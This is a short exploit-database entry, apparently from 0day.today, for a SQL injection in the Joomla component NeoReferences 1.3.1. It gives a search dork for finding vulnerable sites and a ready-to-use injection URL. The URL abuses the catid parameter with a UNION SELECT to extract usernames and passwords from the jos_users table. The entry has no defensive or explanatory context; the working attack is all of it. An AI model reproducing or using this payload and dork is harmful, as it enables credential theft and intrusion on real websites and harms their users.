id: 2584
date: 02/01/2008
title: Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln
author: S@BUN
cves: 

===============================================================
Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln
===============================================================


#########################################################################
#
# joomla SQL Injection(com_neoreferences)
#
#########################################################################
#
# DorKs 1 : allinurl: "com_neoreferences"
#
########################################################################
EXPLOIT :

index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*






#  0day.today [2023-03-24]  #